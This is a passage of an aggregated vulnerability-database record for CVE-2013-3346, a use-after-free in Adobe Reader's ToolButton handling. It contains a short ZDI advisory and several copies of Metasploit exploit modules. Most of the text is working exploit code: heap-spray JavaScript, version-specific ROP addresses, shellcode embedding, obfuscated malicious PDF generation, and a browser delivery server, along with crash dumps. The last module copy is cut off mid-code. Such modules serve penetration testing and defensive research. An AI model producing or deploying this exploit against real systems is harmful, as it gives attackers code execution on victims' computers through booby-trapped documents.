"2013-12-17T00:00:00", "published": "2013-12-17T00:00:00", "href": "https://packetstormsecurity.com/files/124463/Adobe-Reader-ToolButton-Use-After-Free.html", "id": "PACKETSTORM:124463", "type": "packetstorm", "title": "Adobe Reader ToolButton Use After Free", "sourceData": "`## \n# This module requires Metasploit: http//metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::FILEFORMAT \ninclude Msf::Exploit::RopDb \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Adobe Reader ToolButton Use After Free', \n'Description' => %q{ \nThis module exploits an use after free condition on Adobe Reader versions 11.0.2, 10.1.6 \nand 9.5.4 and prior. The vulnerability exists while handling the ToolButton object, where \nthe cEnable callback can be used to early free the object memory. Later use of the object \nallows triggering the use after free condition. This module has been tested successfully \non Adobe Reader 11.0.2, 10.0.4 and 9.5.0 on Windows XP SP3, as exploited in the wild in \nNovember, 2013. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Soroush Dalili', # Vulnerability discovery \n'Unknown', # Exploit in the wild \n'sinn3r', # Metasploit module \n'juan vazquez' # Metasploit module \n], \n'References' => \n[ \n[ 'CVE', '2013-3346' ], \n[ 'OSVDB', '96745' ], \n[ 'ZDI', '13-212' ], \n[ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb13-15.html' ], \n[ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html' ] \n], \n'Payload' => \n{ \n'Space' => 1024, \n'BadChars' => \"\\x00\", \n'DisableNops' => true \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Windows XP / Adobe Reader 9/10/11', { }], \n], \n'Privileged' => false, \n'DisclosureDate' => 'Aug 08 2013', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']), \n], self.class) \nend \n \ndef exploit \njs_data = make_js \n \n# Create the pdf \npdf = make_pdf(js_data) \n \nprint_status(\"Creating '#{datastore['FILENAME']}' file...\") \n \nfile_create(pdf) \nend \n \n \ndef make_js \n \n# CreateFileMappingA + MapViewOfFile + memcpy rop chain \nrop_9 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '9' })) \nrop_10 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '10' })) \nrop_11 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '11' })) \nescaped_payload = Rex::Text.to_unescape(payload.encoded) \n \njs = %Q| \nfunction heapSpray(str, str_addr, r_addr) { \nvar aaa = unescape(\"%u0c0c\"); \naaa += aaa; \nwhile ((aaa.length + 24 + 4) < (0x8000 + 0x8000)) aaa += aaa; \nvar i1 = r_addr - 0x24; \nvar bbb = aaa.substring(0, i1 / 2); \nvar sa = str_addr; \nwhile (sa.length < (0x0c0c - r_addr)) sa += sa; \nbbb += sa; \nbbb += aaa; \nvar i11 = 0x0c0c - 0x24; \nbbb = bbb.substring(0, i11 / 2); \nbbb += str; \nbbb += aaa; \nvar i2 = 0x4000 + 0xc000; \nvar ccc = bbb.substring(0, i2 / 2); \nwhile (ccc.length < (0x40000 + 0x40000)) ccc += ccc; \nvar i3 = (0x1020 - 0x08) / 2; \nvar ddd = ccc.substring(0, 0x80000 - i3); \nvar eee = new Array(); \nfor (i = 0; i < 0x1e0 + 0x10; i++) eee[i] = ddd + \"s\"; \nreturn; \n} \nvar shellcode = unescape(\"#{escaped_payload}\"); \nvar executable = \"\"; \nvar rop9 = unescape(\"#{rop_9}\"); \nvar rop10 = unescape(\"#{rop_10}\"); \nvar rop11 = unescape(\"#{rop_11}\"); \nvar r11 = false; \nvar vulnerable = true; \n \nvar obj_size; \nvar rop; \nvar ret_addr; \nvar rop_addr; \nvar r_addr; \n \nif (app.viewerVersion >= 9 && app.viewerVersion < 10 && app.viewerVersion <= 9.504) { \nobj_size = 0x330 + 0x1c; \nrop = rop9; \nret_addr = unescape(\"%ua83e%u4a82\"); \nrop_addr = unescape(\"%u08e8%u0c0c\"); \nr_addr = 0x08e8; \n} else if (app.viewerVersion >= 10 && app.viewerVersion < 11 && app.viewerVersion <= 10.106) { \nobj_size = 0x360 + 0x1c; \nrop = rop10; \nrop_addr = unescape(\"%u08e4%u0c0c\"); \nr_addr = 0x08e4; \nret_addr = unescape(\"%ua8df%u4a82\"); \n} else if (app.viewerVersion >= 11 && app.viewerVersion <= 11.002) { \nr11 = true; \nobj_size = 0x370; \nrop = rop11; \nrop_addr = unescape(\"%u08a8%u0c0c\"); \nr_addr = 0x08a8; \nret_addr = unescape(\"%u8003%u4a84\"); \n} else { \nvulnerable = false; \n} \n \nif (vulnerable) { \nvar payload = rop + shellcode; \nheapSpray(payload, ret_addr, r_addr); \n \nvar part1 = \"\"; \nif (!r11) { \nfor (i = 0; i < 0x1c / 2; i++) part1 += unescape(\"%u4141\"); \n} \npart1 += rop_addr; \nvar part2 = \"\"; \nvar part2_len = obj_size - part1.length * 2; \nfor (i = 0; i < part2_len / 2 - 1; i++) part2 += unescape(\"%u4141\"); \nvar arr = new Array(); \n \nremoveButtonFunc = function () { \napp.removeToolButton({ \ncName: \"evil\" \n}); \n \nfor (i = 0; i < 10; i++) arr[i] = part1.concat(part2); \n} \n \naddButtonFunc = function () { \napp.addToolButton({ \ncName: \"xxx\", \ncExec: \"1\", \ncEnable: \"removeButtonFunc();\" \n}); \n} \n \napp.addToolButton({ \ncName: \"evil\", \ncExec: \"1\", \ncEnable: \"addButtonFunc();\" \n}); \n} \n| \n \njs \nend \n \ndef RandomNonASCIIString(count) \nresult = \"\" \ncount.times do \nresult << (rand(128) + 128).chr \nend \nresult \nend \n \ndef ioDef(id) \n\"%d 0 obj \\n\" % id \nend \n \ndef ioRef(id) \n\"%d 0 R\" % id \nend \n \n \n#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/ \ndef nObfu(str) \n#return str \nresult = \"\" \nstr.scan(/./u) do |c| \nif rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z' \nresult << \"#%x\" % c.unpack(\"C*\")[0] \nelse \nresult << c \nend \nend \nresult \nend \n \n \ndef ASCIIHexWhitespaceEncode(str) \nresult = \"\" \nwhitespace = \"\" \nstr.each_byte do |b| \nresult << whitespace << \"%02x\" % b \nwhitespace = \" \" * (rand(3) + 1) \nend \nresult << \">\" \nend \n \n \ndef make_pdf(js) \nxref = [] \neol = \"\\n\" \nendobj = \"endobj\" << eol \n \n# Randomize PDF version? \npdf = \"%PDF-1.5\" << eol \npdf << \"%\" << RandomNonASCIIString(4) << eol \n \n# catalog \nxref << pdf.length \npdf << ioDef(1) << nObfu(\"<<\") << eol \npdf << nObfu(\"/Pages \") << ioRef(2) << eol \npdf << nObfu(\"/Type /Catalog\") << eol \npdf << nObfu(\"/OpenAction \") << ioRef(4) << eol \n# The AcroForm is required to get icucnv36.dll / icucnv40.dll to load \npdf << nObfu(\"/AcroForm \") << ioRef(6) << eol \npdf << nObfu(\">>\") << eol \npdf << endobj \n \n# pages array \nxref << pdf.length \npdf << ioDef(2) << nObfu(\"<<\") << eol \npdf << nObfu(\"/Kids [\") << ioRef(3) << \"]\" << eol \npdf << nObfu(\"/Count 1\") << eol \npdf << nObfu(\"/Type /Pages\") << eol \npdf << nObfu(\">>\") << eol \npdf << endobj \n \n# page 1 \nxref << pdf.length \npdf << ioDef(3) << nObfu(\"<<\") << eol \npdf << nObfu(\"/Parent \") << ioRef(2) << eol \npdf << nObfu(\"/Type /Page\") << eol \npdf << nObfu(\">>\") << eol # end obj dict \npdf << endobj \n \n# js action \nxref << pdf.length \npdf << ioDef(4) << nObfu(\"<<\") \npdf << nObfu(\"/Type/Action/S/JavaScript/JS \") + ioRef(5) \npdf << nObfu(\">>\") << eol \npdf << endobj \n \n# js stream \nxref << pdf.length \ncompressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js)) \npdf << ioDef(5) << nObfu(\"<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>\" % compressed.length) << eol \npdf << \"stream\" << eol \npdf << compressed << eol \npdf << \"endstream\" << eol \npdf << endobj \n \n### \n# The following form related data is required to get icucnv36.dll / icucnv40.dll to load \n### \n \n# form object \nxref << pdf.length \npdf << ioDef(6) \npdf << nObfu(\"<</XFA \") << ioRef(7) << nObfu(\">>\") << eol \npdf << endobj \n \n# form stream \nxfa = <<-EOF \n<?xml version=\"1.0\" encoding=\"UTF-8\"?> \n<xdp:xdp xmlns:xdp=\"http://ns.adobe.com/xdp/\"> \n<config xmlns=\"http://www.xfa.org/schema/xci/2.6/\"> \n<present><pdf><interactive>1</interactive></pdf></present> \n</config> \n<template xmlns=\"http://www.xfa.org/schema/xfa-template/2.6/\"> \n<subform name=\"form1\" layout=\"tb\" locale=\"en_US\"> \n<pageSet></pageSet> \n</subform></template></xdp:xdp> \nEOF \n \nxref << pdf.length \npdf << ioDef(7) << nObfu(\"<</Length %s>>\" % xfa.length) << eol \npdf << \"stream\" << eol \npdf << xfa << eol \npdf << \"endstream\" << eol \npdf << endobj \n \n### \n# end form stuff for icucnv36.dll / icucnv40.dll \n### \n \n \n# trailing stuff \nxrefPosition = pdf.length \npdf << \"xref\" << eol \npdf << \"0 %d\" % (xref.length + 1) << eol \npdf << \"0000000000 65535 f\" << eol \nxref.each do |index| \npdf << \"%010d 00000 n\" % index << eol \nend \n \npdf << \"trailer\" << eol \npdf << nObfu(\"<</Size %d/Root \" % (xref.length + 1)) << ioRef(1) << \">>\" << eol \n \npdf << \"startxref\" << eol \npdf << xrefPosition.to_s() << eol \n \npdf << \"%%EOF\" << eol \npdf \nend \n \nend \n \n \n=begin \n \n* crash Adobe Reader 10.1.4 \n \nFirst chance exceptions are reported before any exception handling. \nThis exception may be expected and handled. \neax=0c0c08e4 ebx=00000000 ecx=02eb6774 edx=66dd0024 esi=02eb6774 edi=00000001 \neip=604d3a4d esp=0012e4fc ebp=0012e51c iopl=0 nv up ei pl nz ac po cy \ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010213 \nAcroRd32_60000000!PDFLTerm+0xbb7cd: \n604d3a4d ff9028030000 call dword ptr [eax+328h] ds:0023:0c0c0c0c=???????? \n \n* crash Adobe Reader 11.0.2 \n \n(940.d70): Access violation - code c0000005 (first chance) \nFirst chance exceptions are reported before any exception handling. \nThis exception may be expected and handled. \n*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\\Program Files\\Adobe\\Reader 11.0\\Reader\\AcroRd32.dll - \neax=0c0c08a8 ebx=00000001 ecx=02d68090 edx=5b21005b esi=02d68090 edi=00000000 \neip=60197b9b esp=0012e3fc ebp=0012e41c iopl=0 nv up ei pl nz ac po cy \ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210213 \nAcroRd32_60000000!DllCanUnloadNow+0x1493ae: \n60197b9b ff9064030000 call dword ptr [eax+364h] ds:0023:0c0c0c0c=???????? \n \n=end \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/124463/windows-fileformat-adobe_toolbutton.rb.txt"}], "zdi": [{"lastseen": "2016-11-09T00:17:52", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Reader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the handling of the callbacks associated with ToolButton objects. A reference to the ToolButton object is kept when executing a callback which can lead to a use-after-free scenario if the callback removes the ToolButton object. An attacker can leverage this situation to execute code under the context of the user.", "modified": "2013-11-09T00:00:00", "published": "2013-09-11T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-13-212", "id": "ZDI-13-212", "title": "Adobe Reader ToolButton Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2019-10-15T05:39:30", "bulletinFamily": "exploit", "description": "This module exploits an use after free condition on Adobe Reader versions 11.0.2, 10.1.6 and 9.5.4 and prior. The vulnerability exists while handling the ToolButton object, where the cEnable callback can be used to early free the object memory. Later use of the object allows triggering the use after free condition. This module has been tested successfully on Adobe Reader 11.0.2 and 10.0.4, with IE and Windows XP SP3, as exploited in the wild in November, 2013. At the moment, this module doesn't support Adobe Reader 9 targets; in order to exploit Adobe Reader 9 the fileformat version of the exploit can be used.\n", "modified": "2017-07-24T13:26:21", "published": "2013-12-16T20:13:47", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/ADOBE_TOOLBUTTON", "href": "", "type": "metasploit", "title": "Adobe Reader ToolButton Use After Free", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::BrowserExploitServer\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Adobe Reader ToolButton Use After Free\",\n 'Description' => %q{\n This module exploits an use after free condition on Adobe Reader versions 11.0.2, 10.1.6\n and 9.5.4 and prior. The vulnerability exists while handling the ToolButton object, where\n the cEnable callback can be used to early free the object memory. Later use of the object\n allows triggering the use after free condition. This module has been tested successfully\n on Adobe Reader 11.0.2 and 10.0.4, with IE and Windows XP SP3, as exploited in the wild in\n November, 2013. At the moment, this module doesn't support Adobe Reader 9 targets; in order\n to exploit Adobe Reader 9 the fileformat version of the exploit can be used.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Soroush Dalili', # Vulnerability discovery\n 'Unknown', # Exploit in the wild\n 'sinn3r', # Metasploit module\n 'juan vazquez' # Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-3346' ],\n [ 'OSVDB', '96745' ],\n [ 'ZDI', '13-212' ],\n [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb13-15.html' ],\n [ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html' ]\n ],\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Payload' =>\n {\n 'Space' => 1024,\n 'BadChars' => \"\\x00\",\n 'DisableNops' => true\n },\n 'BrowserRequirements' =>\n {\n :source => /script|headers/i,\n :os_name => OperatingSystems::Match::WINDOWS_XP,\n :ua_name => Msf::HttpClients::IE\n },\n 'Targets' =>\n [\n [ 'Windows XP / IE / Adobe Reader 10/11', { } ],\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Aug 08 2013\",\n 'DefaultTarget' => 0))\n\n end\n\n def on_request_exploit(cli, request, target_info)\n print_status(\"request: #{request.uri}\")\n js_data = make_js(cli, target_info)\n # Create the pdf\n pdf = make_pdf(js_data)\n print_status(\"Sending PDF...\")\n send_response(cli, pdf, { 'Content-Type' => 'application/pdf', 'Pragma' => 'no-cache' })\n end\n\n def make_js(cli, target_info)\n # CreateFileMappingA + MapViewOfFile + memcpy rop chain\n rop_10 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '10' }))\n rop_11 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '11' }))\n escaped_payload = Rex::Text.to_unescape(get_payload(cli, target_info))\n\n js = %Q|\nfunction heapSpray(str, str_addr, r_addr) {\n var aaa = unescape(\"%u0c0c\");\n aaa += aaa;\n while ((aaa.length + 24 + 4) < (0x8000 + 0x8000)) aaa += aaa;\n var i1 = r_addr - 0x24;\n var bbb = aaa.substring(0, i1 / 2);\n var sa = str_addr;\n while (sa.length < (0x0c0c - r_addr)) sa += sa;\n bbb += sa;\n bbb += aaa;\n var i11 = 0x0c0c - 0x24;\n bbb = bbb.substring(0, i11 / 2);\n bbb += str;\n bbb += aaa;\n var i2 = 0x4000 + 0xc000;\n var ccc = bbb.substring(0, i2 / 2);\n while (ccc.length < (0x40000 + 0x40000)) ccc += ccc;\n var i3 = (0x1020 - 0x08) / 2;\n var ddd = ccc.substring(0, 0x80000 - i3);\n var eee = new Array();\n for (i = 0; i < 0x1e0 + 0x10; i++) eee[i] = ddd + \"s\";\n return;\n}\nvar shellcode = unescape(\"#{escaped_payload}\");\nvar executable = \"\";\nvar rop10 = unescape(\"#{rop_10}\");\nvar rop11 = unescape(\"#{rop_11}\");\nvar r11 = false;\nvar vulnerable = true;\n\nvar obj_size;\nvar rop;\nvar ret_addr;\nvar rop_addr;\nvar r_addr;\n\nif (app.viewerVersion >= 10 && app.viewerVersion < 11 && app.viewerVersion <= 10.106) {\n obj_size = 0x360 + 0x1c;\n rop = rop10;\n rop_addr = unescape(\"%u08e4%u0c0c\");\n r_addr = 0x08e4;\n ret_addr = unescape(\"%ua8df%u4a82\");\n} else if (app.viewerVersion >= 11 && app.viewerVersion <= 11.002) {\n r11 = true;\n obj_size = 0x370;\n rop = rop11;\n rop_addr = unescape(\"%u08a8%u0c0c\");\n r_addr = 0x08a8;\n ret_addr = unescape(\"%u8003%u4a84\");\n} else {\n vulnerable = false;\n}\n\nif (vulnerable) {\n var payload = rop + shellcode;\n heapSpray(payload, ret_addr, r_addr);\n\n var part1 = \"\";\n if (!r11) {\n for (i = 0; i < 0x1c / 2; i++) part1 += unescape(\"%u4141\");\n }\n part1 += rop_addr;\n var part2 = \"\";\n var part2_len = obj_size - part1.length * 2;\n for (i = 0; i < part2_len / 2 - 1; i++) part2 += unescape(\"%u4141\");\n var arr = new Array();\n\n removeButtonFunc = function () {\n app.removeToolButton({\n cName: \"evil\"\n });\n\n for (i = 0; i < 10; i++) arr[i] = part1.concat(part2);\n }\n\n addButtonFunc = function () {\n app.addToolButton({\n cName: \"xxx\",\n cExec: \"1\",\n cEnable: \"removeButtonFunc();\"\n });\n }\n\n app.addToolButton({\n cName: \"evil\",\n cExec: \"1\",\n cEnable: \"addButtonFunc();\"\n });\n}\n|\n\n js\n end\n\n def random_non_ascii_string(count)\n result = \"\"\n count.times do\n result << (rand(128) + 128).chr\n end\n result\n end\n\n def io_def(id)\n \"%d 0 obj \\n\" % id\n end\n\n def io_ref(id)\n \"%d 0 R\" % id\n end\n\n\n #http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/\n def n_obfu(str)\n #return str\n result = \"\"\n str.scan(/./u) do |c|\n if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'\n result << \"#%x\" % c.unpack(\"C*\")[0]\n else\n result << c\n end\n end\n result\n end\n\n\n def ascii_hex_whitespace_encode(str)\n result = \"\"\n whitespace = \"\"\n str.each_byte do |b|\n result << whitespace << \"%02x\" % b\n whitespace = \" \" * (rand(3) + 1)\n end\n result << \">\"\n end\n\n\n def make_pdf(js)\n xref = []\n eol = \"\\n\"\n endobj = \"endobj\" << eol\n\n # Randomize PDF version?\n pdf = \"%PDF-1.5\" << eol\n pdf << \"%\" << random_non_ascii_string(4) << eol\n\n # catalog\n xref << pdf.length\n pdf << io_def(1) << n_obfu(\"<<\") << eol\n pdf << n_obfu(\"/Pages \") << io_ref(2) << eol\n pdf << n_obfu(\"/Type /Catalog\") << eol\n pdf << n_obfu(\"/OpenAction \") << io_ref(4) << eol\n # The AcroForm is required to get icucnv36.dll / icucnv40.dll to load\n pdf << n_obfu(\"/AcroForm \") << io_ref(6) << eol\n pdf << n_obfu(\">>\") << eol\n pdf << endobj\n\n # pages array\n xref << pdf.length\n pdf << io_def(2) << n_obfu(\"<<\") << eol\n pdf << n_obfu(\"/Kids [\") << io_ref(3) << \"]\" << eol\n pdf << n_obfu(\"/Count 1\") << eol\n pdf << n_obfu(\"/Type /Pages\") << eol\n pdf << n_obfu(\">>\") << eol\n pdf << endobj\n\n # page 1\n xref << pdf.length\n pdf << io_def(3) << n_obfu(\"<<\") << eol\n pdf << n_obfu(\"/Parent \") << io_ref(2) << eol\n pdf << n_obfu(\"/Type /Page\") << eol\n pdf << n_obfu(\">>\") << eol # end obj dict\n pdf << endobj\n\n # js action\n xref << pdf.length\n pdf << io_def(4) << n_obfu(\"<<\")\n pdf << n_obfu(\"/Type/Action/S/JavaScript/JS \") + io_ref(5)\n pdf << n_obfu(\">>\") << eol\n pdf << endobj\n\n # js stream\n xref << pdf.length\n compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js))\n pdf << io_def(5) << n_obfu(\"<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>\" % compressed.length) << eol\n pdf << \"stream\" << eol\n pdf << compressed << eol\n pdf << \"endstream\" << eol\n pdf << endobj\n\n ###\n # The following form related data is required to get icucnv36.dll / icucnv40.dll to load\n ###\n\n # form object\n xref << pdf.length\n pdf << io_def(6)\n pdf << n_obfu(\"<</XFA \") << io_ref(7) << n_obfu(\">>\") << eol\n pdf << endobj\n\n # form stream\n xfa = <<-EOF\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<xdp:xdp xmlns:xdp=\"http://ns.adobe.com/xdp/\">\n<config xmlns=\"http://www.xfa.org/schema/xci/2.6/\">\n<present><pdf><interactive>1</interactive></pdf></present>\n</config>\n<template xmlns=\"http://www.xfa.org/schema/xfa-template/2.6/\">\n<subform name=\"form1\" layout=\"tb\" locale=\"en_US\">\n<pageSet></pageSet>\n</subform></template></xdp:xdp>\n EOF\n\n xref << pdf.length\n pdf << io_def(7) << n_obfu(\"<</Length %s>>\" % xfa.length) << eol\n pdf << \"stream\" << eol\n pdf << xfa << eol\n pdf << \"endstream\" << eol\n pdf << endobj\n\n ###\n # end form stuff for icucnv36.dll / icucnv40.dll\n ###\n\n\n # trailing stuff\n xrefPosition = pdf.length\n pdf << \"xref\" << eol\n pdf << \"0 %d\" % (xref.length + 1) << eol\n pdf << \"0000000000 65535 f\" << eol\n xref.each do |index|\n pdf << \"%010d 00000 n\" % index << eol\n end\n\n pdf << \"trailer\" << eol\n pdf << n_obfu(\"<</Size %d/Root \" % (xref.length + 1)) << io_ref(1) << \">>\" << eol\n\n pdf << \"startxref\" << eol\n pdf << xrefPosition.to_s() << eol\n\n pdf << \"%%EOF\" << eol\n pdf\n end\nend\n\n\n=begin\n\n* crash Adobe Reader 10.1.4\n\nFirst chance exceptions are reported before any exception handling.\nThis exception may be expected and handled.\neax=0c0c08e4 ebx=00000000 ecx=02eb6774 edx=66dd0024 esi=02eb6774 edi=00000001\neip=604d3a4d esp=0012e4fc ebp=0012e51c iopl=0 nv up ei pl nz ac po cy\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010213\nAcroRd32_60000000!PDFLTerm+0xbb7cd:\n604d3a4d ff9028030000 call dword ptr [eax+328h] ds:0023:0c0c0c0c=????????\n\n* crash Adobe Reader 11.0.2\n\n(940.d70): Access violation - code c0000005 (first chance)\nFirst chance exceptions are reported before any exception handling.\nThis exception may be expected and handled.\n*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\\Program Files\\Adobe\\Reader 11.0\\Reader\\AcroRd32.dll -\neax=0c0c08a8 ebx=00000001 ecx=02d68090 edx=5b21005b esi=02d68090 edi=00000000\neip=60197b9b esp=0012e3fc ebp=0012e41c iopl=0 nv up ei pl nz ac po cy\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210213\nAcroRd32_60000000!DllCanUnloadNow+0x1493ae:\n60197b9b ff9064030000 call dword ptr [eax+364h] ds:0023:0c0c0c0c=????????\n\n=end\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/adobe_toolbutton.rb"}, {"lastseen": "2019-11-29T21:08:15", "bulletinFamily": "exploit", "description": "This module exploits a use after free condition on Adobe Reader versions 11.0.2, 10.1.6 and 9.5.4 and prior. The vulnerability exists while handling the ToolButton object, where the cEnable callback can be used to early free the object memory. Later use of the object allows triggering the use after free condition. This module has been tested successfully on Adobe Reader 11.0.2, 10.0.4 and 9.5.0 on Windows XP SP3, as exploited in the wild in November, 2013.\n", "modified": "2017-09-14T02:03:34", "published": "2013-12-16T20:13:47", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/ADOBE_TOOLBUTTON", "href": "", "type": "metasploit", "title": "Adobe Reader ToolButton Use After Free", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::RopDb\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Adobe Reader ToolButton Use After Free',\n 'Description' => %q{\n This module exploits a use after free condition on Adobe Reader versions 11.0.2, 10.1.6\n and 9.5.4 and prior. The vulnerability exists while handling the ToolButton object, where\n the cEnable callback can be used to early free the object memory. Later use of the object\n allows triggering the use after free condition. This module has been tested successfully\n on Adobe Reader 11.0.2, 10.0.4 and 9.5.0 on Windows XP SP3, as exploited in the wild in\n November, 2013.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Soroush Dalili', # Vulnerability discovery\n 'Unknown', # Exploit in the wild\n 'sinn3r', # Metasploit module\n 'juan vazquez' # Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-3346' ],\n [ 'OSVDB', '96745' ],\n [ 'ZDI', '13-212' ],\n [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb13-15.html' ],\n [ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html' ]\n ],\n 'Payload' =>\n {\n 'Space' => 1024,\n 'BadChars' => \"\\x00\",\n 'DisableNops' => true\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows XP / Adobe Reader 9/10/11', { }],\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Aug 08 2013',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),\n ])\n end\n\n def exploit\n js_data = make_js\n\n # Create the pdf\n pdf = make_pdf(js_data)\n\n print_status(\"Creating '#{datastore['FILENAME']}' file...\")\n\n file_create(pdf)\n end\n\n\n def make_js\n\n # CreateFileMappingA + MapViewOfFile + memcpy rop chain\n rop_9 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '9' }))\n rop_10 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '10' }))\n rop_11 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '11' }))\n escaped_payload = Rex::Text.to_unescape(payload.encoded)\n\n js = %Q|\nfunction heapSpray(str, str_addr, r_addr) {\n var aaa = unescape(\"%u0c0c\");\n aaa += aaa;\n while ((aaa.length + 24 + 4) < (0x8000 + 0x8000)) aaa += aaa;\n var i1 = r_addr - 0x24;\n var bbb = aaa.substring(0, i1 / 2);\n var sa = str_addr;\n while (sa.length < (0x0c0c - r_addr)) sa += sa;\n bbb += sa;\n bbb += aaa;\n var i11 = 0x0c0c - 0x24;\n bbb = bbb.substring(0, i11 / 2);\n bbb += str;\n bbb += aaa;\n var i2 = 0x4000 + 0xc000;\n var ccc = bbb.substring(0, i2 / 2);\n while (ccc.length < (0x40000 + 0x40000)) ccc += ccc;\n var i3 = (0x1020 - 0x08) / 2;\n var ddd = ccc.substring(0, 0x80000 - i3);\n var eee = new Array();\n for (i = 0; i < 0x1e0 + 0x10; i++) eee[i] = ddd + \"s\";\n return;\n}\nvar shellcode = unescape(\"#{escaped_payload}\");\nvar executable = \"\";\nvar rop9 = unescape(\"#{rop_9}\");\nvar rop10 = unescape(\"#{rop_10}\");\nvar rop11 = unescape(\"#{rop_11}\");\nvar r11 = false;\nvar vulnerable = true;\n\nvar obj_size;\nvar rop;\nvar ret_addr;\nvar rop_addr;\nvar r_addr;\n\nif (app.viewerVersion >= 9 && app.viewerVersion < 10 && app.viewerVersion <= 9.504) {\n obj_size = 0x330 + 0x1c;\n rop = rop9;\n ret_addr = unescape(\"%ua83e%u4a82\");\n rop_addr = unescape(\"%u08e8%u0c0c\");\n r_addr = 0x08e8;\n} else if (app.viewerVersion >= 10 && app.viewerVersion < 11 && app.viewerVersion <= 10.106) {\n obj_size = 0x360 + 0x1c;\n rop = rop10;\n rop_addr = unescape(\"%u08e4%u0c0c\");\n r_addr = 0x08e4;\n ret_addr = unescape(\"%ua8df%u4a82\");\n} else if (app.viewerVersion >= 11 && app.viewerVersion <= 11.002) {\n r11 = true;\n obj_size = 0x370;\n rop = rop11;\n rop_addr = unescape(\"%u08a8%u0c0c\");\n r_addr = 0x08a8;\n ret_addr = unescape(\"%u8003%u4a84\");\n} else {\n vulnerable = false;\n}\n\nif (vulnerable) {\n var payload = rop + shellcode;\n heapSpray(payload, ret_addr, r_addr);\n\n var part1 = \"\";\n if (!r11) {\n for (i = 0; i < 0x1c / 2; i++) part1 += unescape(\"%u4141\");\n }\n part1 += rop_addr;\n var part2 = \"\";\n var part2_len = obj_size - part1.length * 2;\n for (i = 0; i < part2_len / 2 - 1; i++) part2 += unescape(\"%u4141\");\n var arr = new Array();\n\n removeButtonFunc = function () {\n app.removeToolButton({\n cName: \"evil\"\n });\n\n for (i = 0; i < 10; i++) arr[i] = part1.concat(part2);\n }\n\n addButtonFunc = function () {\n app.addToolButton({\n cName: \"xxx\",\n cExec: \"1\",\n cEnable: \"removeButtonFunc();\"\n });\n }\n\n 